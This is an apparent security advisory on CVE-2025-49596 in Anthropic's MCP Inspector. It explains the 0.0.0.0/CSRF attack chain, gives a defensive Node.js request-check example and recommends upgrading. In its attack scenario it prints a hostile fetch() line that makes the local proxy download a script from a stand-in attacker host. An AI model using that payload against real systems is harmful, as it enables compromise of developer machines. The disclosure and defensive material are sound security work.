Critical remote code execution flaw reported in Anthropic's MCP Inspector tool
Take action: If you're using Anthropic's MCP Inspector for AI development, upgrade to version 0.14.1 or later. There is a fairly trivial exploit against MCP Inspector that only requires you to visit a malicious site for your laptop to be fully compromised. So don't ignore this; update your MCP Inspector.
Cybersecurity researchers are reporting a critical security vulnerability in Anthropic's Model Context Protocol (MCP) Inspector project.
The Model Context Protocol (MCP) is an open communication framework introduced by Anthropic in November 2024 that standardizes how large language model applications integrate and share data with external data sources and tools. The MCP Inspector is an official debugging and testing tool developed by Anthropic that consists of two primary components:
- a React-based web user interface (MCP Inspector Client) that provides an interactive interface for testing and debugging MCP servers,
- a Node.js proxy server (MCP Proxy) that acts as a protocol bridge connecting the web UI to MCP servers through various transport methods including stdio, Server-Sent Events, and streamable HTTP connections.
The vulnerability, tracked as CVE-2025-49596 (CVSS score 9.4), allows attackers to achieve remote code execution on developer machines through browser-based attacks that exploit fundamental weaknesses in the tool's default security configuration. The discovery was made by Oligo Security Research, which reported the vulnerability to Anthropic through responsible disclosure protocols.
The attack methodology exploits a chain of vulnerabilities by combining a 19-year-old browser security flaw known as "0.0.0.0 Day" with a cross-site request forgery (CSRF) vulnerability in the MCP Inspector. The 0.0.0.0 Day vulnerability takes advantage of browsers' inability to securely handle the IP address 0.0.0.0, which tells the operating system to listen on all IP addresses assigned to the machine, including the local loopback interface. The MCP Inspector's default configuration lacks fundamental security measures including authentication and access controls.
Attack scenario:
Developer Setup
- Alice, an AI developer, follows the official MCP quickstart guide
- She runs the command:
  run mcp dev server.py
- This automatically starts the MCP Inspector proxy listening on port 6277 (default)
- No authentication is required by default in versions before 0.14.1
The malicious site
- Alice finds an interesting blog post about "New MCP Development Techniques"
- She clicks the link and visits the malicious website
- The page appears to be a legitimate technical blog
Exploit
- Hidden in the webpage is malicious JavaScript code:
  fetch("http://0.0.0.0:6277/sse?transportType=stdio&command=curl&args=-o%20/tmp/backdoor.sh%20https://attacker.com/payload.sh", { "method": "GET", "mode": "no-cors" })
- The JavaScript automatically sends a request to Alice's locally running MCP Inspector
- The request instructs the tool to download and execute a malicious script
- Since there's no authentication, the command runs immediately
- Alice's machine is now compromised
Impact
- The attacker now has code execution on Alice's development machine
- They can steal source code, API keys, or sensitive data
- They can install persistent backdoors for future access
- They can move laterally to other systems on Alice's network
The attack can be further enhanced through DNS rebinding techniques, where attackers create malicious DNS records pointing to local addresses, providing additional pathways to bypass browser security restrictions and achieve code execution.
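The request in the scenario succeeds because nothing on the proxy checks where it came from or who sent it. As an added example (not MCP Inspector code and not the project's 0.14.1 patch), the following Node.js gate shows the three checks a localhost-only proxy needs against the 0.0.0.0, CSRF and DNS rebinding paths described above; the function names, the UI origin on port 6274 and the bearer-token scheme are assumptions made for illustration.

```javascript
// Added example: request gate for a localhost-only debugging proxy.
// Not MCP Inspector code; names, UI origin and token scheme are assumptions.
const crypto = require("node:crypto");

const PROXY_PORT = 6277; // proxy port named in the article
const UI_ORIGINS = new Set([ // assumed origins of the trusted web UI
  "http://localhost:6274",
  "http://127.0.0.1:6274",
]);
const LOOPBACK_HOSTS = new Set([
  `localhost:${PROXY_PORT}`,
  `127.0.0.1:${PROXY_PORT}`,
]);

// Per-session secret, generated at startup and handed only to the local UI.
function newSessionToken() {
  return crypto.randomBytes(32).toString("hex");
}

// Constant-time comparison so the check does not leak how many bytes matched.
function tokenMatches(presented, expected) {
  const a = Buffer.from(String(presented || ""));
  const b = Buffer.from(expected);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// headers: lower-cased header names, as Node's http module supplies them.
function checkRequest(headers, sessionToken) {
  // 1. Host must be a loopback name. A request addressed to 0.0.0.0 or to a
  //    rebinding hostname carries that name in Host and is rejected here.
  if (!LOOPBACK_HOSTS.has((headers.host || "").toLowerCase())) {
    return { allowed: false, reason: "host" };
  }
  // 2. If a browser supplied an Origin, it must be the trusted UI. A simple
  //    cross-site GET can arrive without Origin, so absence proves nothing.
  if (headers.origin !== undefined && !UI_ORIGINS.has(headers.origin)) {
    return { allowed: false, reason: "origin" };
  }
  // 3. Every request must carry the secret; a foreign page cannot read it.
  const m = /^Bearer (.+)$/.exec(headers.authorization || "");
  if (!m || !tokenMatches(m[1], sessionToken)) {
    return { allowed: false, reason: "token" };
  }
  return { allowed: true, reason: "ok" };
}
```

The token check is the one that stops the unauthenticated request; the Host and Origin checks narrow what can reach it.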
Affected versions:
- MCP Inspector versions below 0.14.1
Security researchers also identified internet-facing MCP Inspector instances that were immediately vulnerable to remote exploitation, demonstrating the real-world impact of the security flaw.
Versions that are not affected:
- MCP Inspector version 0.14.1 and later versions
Organizations and developers using MCP Inspector are strongly advised to immediately upgrade to version 0.14.1 or later, as no effective workarounds exist for earlier versions.